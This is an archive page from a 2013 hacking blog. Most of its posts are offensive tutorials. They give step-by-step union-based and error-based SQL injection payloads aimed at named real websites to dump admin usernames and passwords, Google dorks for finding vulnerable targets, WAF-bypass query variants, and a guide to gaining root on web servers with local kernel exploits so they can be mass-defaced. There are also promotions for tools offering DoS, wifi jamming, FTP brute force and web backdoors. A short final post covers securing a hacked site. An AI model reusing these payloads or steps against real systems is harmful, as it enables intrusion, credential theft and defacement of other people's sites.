Monthly Archives: May 2013

How To Use Havij [Automatic SQL Injection]

~

How To Use Havij SQL Injection Tool

Ok Guyz , In this tutorial i’ll show you how to use havij.Its very easy to use actually you dont even need this tutorial but let me clear the concept for you 🙂

What Is Havij ?

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

From Where To Download It ?

You Can Download It For Free And You Can Also Buy License For Havij …
Free Version Of Havij Is Good But Limited In Features But Free Version Is Enough For Us 😀
Paid VersiOn
Awesome For SQL Lovers 😀 btw you can use sqlmap :v :v instead of paid version of havij =v

How To Use Havij ?

Ok First We Have To Find SQL Injectable(Vulnerable) Website So We Can Continue :v

If You Dont Know How To Find Vulnerable Website Than Wait 1 or 2 day(s) I’ll Make Tut On It 😛

So We Have Our Target,
Bloody Sucking Lundian Website :v :v 😀 they are dumb :v
Ok First Of All Download Havij From HERE
Than open Havij and enter the target website in Target Box
Note:- Dont Forget To Add http:// before www
 Now click On Analyze Button
As You Can See , Its Working And Got Important Information Of Website!
Now We Have To Find Tables And Columns , For This Click On Tables And Than Click On Get Tables
 
umm got all the Tables from Database 😛 :v
Now Look In Pic , There Is A Table Named “user_master
http://www.kidsec.com
Now Click On That Table(Actually Click On Empty Box To Tick user_master) Than Click On Get Columns
Now All You Have To Do Is , Just Simply Tick user_id , password and user_name
http://www.kidsec.com

Than Click On Get Data

umm..So Now We Have The Username And Password In Addition , We Can Also Find Admin Login’s Page For This Just Click On Find Admin 😉
Thankx For Reading 
Tut Written By Zaid Sparrow
Be SecureD~

SQL Injection Tutorial [Manual]

~

MySQL Injection Tutorial For Beginners~

Ok , So You Guys Also Wanted To Deface Some Shits ? huh ?
ok than … SQL injection is very common attack around all defacers are using sql injection it can easily be exploited..+ its very easy to find sql injection exploitable websites..
 what we will actually do is , we will try to retrieve database information from MySQL Database..
kidsec.com
===========
Information We Can Easily Retireve ~
1- Admin’s Username 
2-Admin’s Password
3-Current User
4-Current Database
5-MySQL Version 
6-Files etc..
 But we will not retrieve all information listed above , we will try to get Admin’s username and password…
Ready ?
1st of all you have to find sql vulnerable websites ?
  How To Find SQL Injectable Websites ?
 Well.., its pretty easy to find these kind of websites..
we will use SQL Dorks to find websites..
What Is Dork ?
 In Our Language , a way to find sql injectable websites 😀
Few Dorks For You , You Can Use Them To Find SQL Injectable Websites.
==========
inurl:.php?id= site:.in 
inurl:article.php?id= 
inurl:gallery.php?id=
inurl:project.php?id=
=============

Get Back To Injecting Now ,

So We Have Our Target Now , Our Target Is 

How to Check That Website Is Vulnerable ?
Ans- We Will Put ‘ string after the ID= parameter…
and if we got any error like 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aclsiosj/public_html/news.php on line 27
Than We Can Continue Injecting..

First we have to get column count , we will inject order by statement 
kidsec.com
like above !
we will increase number till we get error 
http://www.acls.in/news.php?id=10 order by 7 no error 
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/sheelaqv/public_html/view_news.php on line 66
Now We have 8 Columns , and we will find vulnerable column 😛 
We Will Use Union Select Statements ,
http://sheelahospital.in/view_news.php?id=-55 union select 1,2,3,4,5,6–+-
we will put – before the numbers/value and column count after union select like above..
 now we have Vulnerable Column 😛

Our Vuln Column Is , “3”
Now We Will Replace 2 with our query.umm first we should get version 😀
http://sheelahospital.in/view_news.php?id=-52 union select 1,version(),3,4,5,6–+-
or you can also use @@version instead of version()
kidsec.com
Now we have Database version.If the version is below 5 than we cant continue because we will have to guess table names and column names -_- 
“My Mind Is Saying Task Error :v”
kidsec.com
Now We Will Find Tables
We Will Use lil query to get table names and the query is 
group_concat(table_name) from information_schema.tables where table_schema=database()–+-
Replace Vuln Column Count With group_concat(table_name)
than write the rest after column counting like below

 Example :-

 http://www.acls.in/news.php?id=-10 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()–+-
Now we have table names 😀
Now We Will Extract Column Names From user_master
Note:- We Will Have To Convert Our Table Name In To HEX to get column name
user_master => 757365725f6d6173746572
than you have to put 0x before HEX value !
i converted it from swingnote.com/tools/texttohex.php
we dont have much changes in our query just change (table_name) to => (column_name)
information_schema.tables to => information_schema.columns 
where table_schema=database()–+- to =>  
where table_name=0x757365725f6d6173746572–+-

 Example :-

http://www.acls.in/news.php?id=-10 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=0x757365725f6d6173746572–+-

 Now We Have Column Names ;P :v


Now We Can Easily Retrieve Admin’s Information 😀 (dumbest security ever :v)
We will use little query 😀
http://www.acls.in/news.php?id=-10 union select 1,2,group_concat(user_name,0x3a,password),4,5,6,7,8 from user_master–+-
So Now , We Have Username And Password 😀 Now You Can Find Admin Login Page By Havij 😛
Its Very Fast -_-
Tips
You Can Also Use Automated tools For Injecting Like SQLMAP , SQLNINJA , Havij etc..
Havij Works Perfect!!
Note: Plz Dont Leech !
Written By Zaid Sparrow
Be Secured ~

CAST v2 Pentesting Tool

~

Counter Attack Scaning Tools Version 2 (CAST.V2) 

CAST v2 releaseD~
What Is CAST v2?
 It’s A Kind Of Pentesting Tool/script written in Bash Language…
It’s very easy to use and works perfect in BackTrack & Kali…
  With This Tool , Information Gathering Become Very EasY~
Features~
 |  CAST.V2  |
      -------------
            |
            |
--------------------------
| Information Gathering  |-------------- 1) Scan Live Host
--------------------------         |---- 2) Port Scaner
            |                      |---- 3) Network Trafic with Kismet
            |                      |---- 4) Network Monitoring with Netdiscover
            |                      I---- 5) Detect Netcut!
-----------------------
| Exploitation Tools  |---------------- 6) Blocked Access Point
-----------------------           I---- 7) Netcut With Tcpkill
            |
            |
      --------------
      | Honeypots  |-------------------- 8) Install Honeypot
      --------------               I---- 9) Create Fake Access Point
            |
            |
    -------------------
    | Stress Testing  |----------------- 10) DOS Attack With Hping3
    -------------------            |---- 11) UDP Flood with Udp.pl
            |                      |---- 12) Dos Attack With Slowloris
            |                      |---- 13) Flood Access Point
            |                      |---- 14) WifiJammer
            |                      I---- 15) Kick All Client From wifi
   ----------------------
   | Network Forensics  |--------------- 16) Network Forensic With Wireshark
   ----------------------          I---- 17) Image Captures With driftnet
            |
       -----------
       | Service |---------------------- 18) Credits And About
       -----------
            |
       -----------
       |   EXIT  |
       -----------
[Image: 483979_365887996859967_1228847107_n.jpg] 
[Image: Screenshot-1_zps3479b05c.png]
Note:- Usage Is Based On Numbers~

Download HERE

How Root A Web Server

~

How To Root A Web Server

Salam Awll :p
Today im Going To Sh0w y0uh..
 h0w t0 r00t the server.. 😉
———
What Is Rooting ?

Ans – Getting access to the user =”r00t” Master,admin,main user blah bla..

root Server To Get Full Access To The server..
y0u can d0 many thing after r00ting the server..
Ex-: Mass Defacing 

 TooLs/

1) hacked Server 2009/2010//2011/2012 😉 any of these..
2) Expl0it [Local r00t expl0it
3) and n0thing..
Ready !

Open y0ur shell..
Check y0ur Kernel Version..

uname -a

If its 2.6.18 2011, y0u can r00t it..
2.6.32 2012 y0u can als0 r00t that bit**
2010 and 2009 als0 r00table…
make dir :

mkdir tmp  

/ its always writable 😉 

——————
Now give this command –
cd tmp
now, again make new dir … in tmp dir..
mkdir b0x
now cd t0 b0x 
cd b0x 
 www.lol.com/tmp/b0x/
—————
Now, Search For Expl0it..
 How To Search f0r Expl0!t?
 
Type This In Goo0gle.
2.6.18 2011 local r00t expl0it..
y0u’ll get it.
We need t0 compile Expl0it:
f0r this type: gcc -o exploit eploit.c

Give This Command /
chmod 777 exploit

Then G!ve this Command:
./exploit
it Will sh0w y0u:
g0t r00t mofo!
 ——————|  
 To check y0u g0t r00t 0r not?

Type :

whoami

if its sh0w you
    root
mean y0u g0t root mofo 😀

—–=-=-=-=-=——========—-
                                         Expl0it Sites//                                     
  —————————————-
                             – Exploit-db.com                               
                           -Packetstormsecurity.org              
                            -Th3-0utl4ws.com                           
                          -Leetupload.com                             
——————————————|
Note:- For Educational Purpose ONLY!!!!!!!!!!!
Enj0y.. 😉

SQLI All Common Problem Solutions

~
SQL Injection Beginner Problems Solved~
 =====================
ok guyz , so you are having problem with sql injection ? cant get the columns count ?
order by query not working ? every thing is solved now
below i’ll tell you how to get the solutions 😉 
What to Do If Order By Query Is Not Working ?
 
 So you have a vulnerable sit
  www.site.com/index.php?id=1

but the problem is that order by is not working
you entered this command:-
site.com/index.php?id=1 order by 1--

<< no eror

site.com/index.php?id=1 order by 5--

<<no eror

site.com/index.php?id=1 order by 100--

<< no eror.. wtf !!!

if you get this problem then use sqli string based and put this command:-

site.com/index.php?id=1' order by 1--+-

<<no eror

site.com/index.php?id=1' order by 5--+-

<<no eror

site.com/index.php?id=1' order by 100--+-

<<eror :)

Note:- you can see i have also putted a single qoute (‘) at the place (id=1’)<<so be carefull about this

* some times if you get problems by using order by e.g

site.com/index.php?id=1 order by 100--

<<no eror

or

Code:

site.com/index.php?id=1 order by 1--

<<eror

then try to change the query like this

site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*

here are some more quries like:

-- - ,, --++- ,, -++--,,

* ok while injecting a site if you see that there are no usefull table..!
like (admin,auth,users,members,login) etc then remember every site have different number of schemas
and there are different tables in every schema and you will get schema names by this command:-

site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

and then tables from different schema using this:-

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

Column Names:-

site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x


hope it will help you :)

* most sites has the problem when you try to get table names and it gives syntax eror
e.g you used this command:-

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
and it give syntax eror like you have eror near at line..blah blah
on this condition you have to use different methods untill your success
am writing down some of these commands:-

site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--

site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1

site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--


hope it will help you :)

* union select gives eror= illegal mix of collection

illegal mix of collection

or something like this

then you should use this method:-

site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--
current user:-

site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--

Or

site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--

site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--

mostly unhex(hex)) use to bypass illegal mix of collection eror..


if still not working then you should use this:-
site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--

* WAF (Web Application Firewal)

WAF stands for (Web Application Firewal) it blocks the commands and queries it will not block “order by”
but it will block your command “union select” and while using “union select” you will get this eror:-

404 forbidden you do not have permission to access blah blah
AnD
not acceptible you do not have to permission blah blah
ok now you can bypass this using these commands:-
site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(version()),4--
* site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables--
if not working then:-

site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables


* site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,/*!CoNcAt*/(/*!table_name*/),4 from /*!information_schema*/.tables

==============================================
It Will Surely Help You ;)

* if still getting eror again and again then you should use sql double query eror base and you can find here my tutorial about sql double query eror based

it will be something like this:-

www.site.com/index.php?id=-1+and+(select+1+from(select
count(*),concat((select+concat(version())+from+information_schema.tables+limit+0 ​,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

www.site.com/index.php?id=-1+and+(select+1+from(select
count(*),concat((select+concat(table_name)+from+information_schema.tables+where+ ​ table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.ta ​bles+group+by+a)b)

if still not acceptible or forbidden eror then use this:-

http://www.site.com/index.php?id=1 oR 1 group by concat_ws(0x3a,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1–

  ====================
I Hope This Article Helped You 😉
  If You Need Any Kind Of Help Than Contact Me 🙂
Please Dont Leech It
For educational purpose only… 

IP Digger 4.0 Released~

~
 

[+] The Weapon Of Mass Destruction IP-DiggEr v4.0 Released xD
[+] Project Name :- IP-DiggEr v4.o The Next Level
Features Of IP-DiggEr v4.0 The WeB Xploit3r The Next Level

FTP Brute Force
Admin Panel Finder

Website Vulnerability Scanning To0ls
——————————————–
Joomla Vulnerability Scanner
WordPress Vulnerability Scanner
UniScan -> Web Vulnerability Scanner
——————————————–
Uploaded Shell Finder ( Website )
——————————————–

Web-Backd0or ( Weevely )
——————————————–
Web Backd0or Generator ( Weevely )
Web Backd0or Server Connect0r ( Weevely )

Other Hacking To0lKit
——————————————–
W3bSploit T0olkit by 0x0ptim0us
==============================================
Ip- DiggEr v4.0 The WeB Xploit3r The Next Level
Download Link :- Ip DIGGER 4 Download
Link To The Usage Of IP digger ~ How To Use Ip DIGGER
No Virus Is Been Detected~

1337day Got Hacked By TurkGuvenligi

~

  1337day.com Got Hacked By TurkGuvenligi
Hacker Site + Mirror
=============================
Message By H4x0rs 

TurkGuvenligi
we told you to ban this fake user >>>
http://www.1337day.com/author/5819
is it so difficult or you are so stupid?
Fuck all exploit kiddies, Fuck all exploit sellers 🙂
 =====================================================
 

How To Use IP Digger 3 ?

~
How To Use IP Digger 3 ?
The Freak Coderz team has released the Ip-Digger v3.0 The WeB Xploit3r whic includes all new features
which a hacker required while exploiting a website .
It is tool used when you are not able to take down or hack the main website but by this tool you can get the server access.
Itz all user friendly and It is free for all =))
Features Of IP-DiggEr v3.0 The WeB Xploit3r
Note:-
Ip Digger Is Coded In Bash , Use Backtrack To Run It Easily 😉  
Requirements To Use IP Digger 3 
1) Backtrack
2) Internet
3) Victim
First of all open backtrack and download IP Digger
  
Now open IP digger and extract it using Mount Archiver(Built-In Backtrack)
  the name will be 
ip-digger3.sh.x 
you have to change it to 
ip.sh
now open terminal and and cd(change directory)to where you download IP Digger
Sparrow@root:~# cd Desktop
/Desktop:~# now type 
chmod +x ip.sh



now open terminal and type 
./ip.sh
than you’ll see many options you can choose any option by typing the correct number..

kidsec.com
Thats All Folks 😛
Written By Zaid Sparrow
Please Dont Leeche
=====================
FOR EDUCATIONAL PURPOSE ONLY
====================

What To Do If Your Website Got Hacked ?

~
I Got Hacked 😮 What Should I Do Now ?
 What will you gonna do if you got hacked by hackers ?
take it seriously hacker can flush you out of the Internet !!
 if you are using website than you must read this article..
ok lemme start 🙂
Article BreakDown –
 1. -Past-
2. -Present-
3. -Future-
Well there will be three part of this article and i’ll tell you each one by one 😉
ok so Lets Start From Past..
1. -Past-
1a-i hope you must created any back-up of your website ? 
“Yes”? ohh good 
“NO” ohh 😦
2a-.you must be posting like fools ? 123 posted 456 posted 789 posted huh ?
3a.-  ever checked your logs ?
“NO”? awwww :S
4a.-ever used any kind of security ?
no ? deah well leave it …
2. -Present-
So finally you got defaced by hackers? actually its your fault…
now first of all goto cpanel and try restoring your index.html code (MainPageCode)
sometimes hackers deletes Admin Login Page, if your Admin Login’s page deleted also than upload new.By Doing This , you actually g0t rid of defaced index :v
2a. Check backdoors , find them and kill them :@ 😀
2b. Change Your Admin Login Password.
2c. Change Your cPanel Password.
2d. Try To Find That Nooby Shell some common shells are
WSO , r57 , c99 , Web-Root , Mad-spot you got defaced because of shell because it works same as cPanel…
2ea. Delete all Files And BackDoors Of Hacker…

3. -Future-
Ok Its Time To Safe Your Website From Getting Hacked And Defaced Again.
Actually You Can Make Your Website Full Secured From Hackers By The Lil Usage 😉
lets start,
3a. Choose Good Hosting Like – HostGator,Hostmonster,LiteSpeed,WebsiteWelcome,Bluehost..
these hosting does not allow symlink.Its very tough to symlink on these type of hosting servers there security very tyt 😀 
3b.Make a quick scan of your website using any vulnerability scanner.
There are variety of good vulnerability scanners
Acunetix , Safe3 , Net Sparker , Websecurity(Good) , Uniscan,
4b.You must protect your database config to be secured.if you are secured than hacker will try to attack another website which is hosted on your server,than there are some chances of symlink and you can be defaced.
3c.Use Latest Security Updates.
3d.Protect your Admin Login’s Page And config.php using .htaccess
Ok so you are using WordPress than i have something for you 😀
First of all protect wp-config.php below is the code for protecting wp-config.php

Wp-Config Protection


order allow,deny
deny from all

Wp-Admin Login Protection

 order deny,allow 

allow from 202.090.21.1 (replace with your IP address) 
deny from all

Disabling Directory Listings,

 # directory browsing 
Options All -Indexes

Prevent wp-content Access

Order deny,allow 
Deny from all
 
Allow from all
 

Protect Your .htaccess Now ,


order allow,deny 
deny from all 
satisfy all 
  
Some Tips,
always Choose Good CMS For Blogging 
Good Hosting Provider
dont Mess With Hackers
==============================
kidsec.com
Written By Zaid Sparrow
Dont Leech
Be Secured
Glitch , Bitch And Ditch - Be Aware.
========================
Â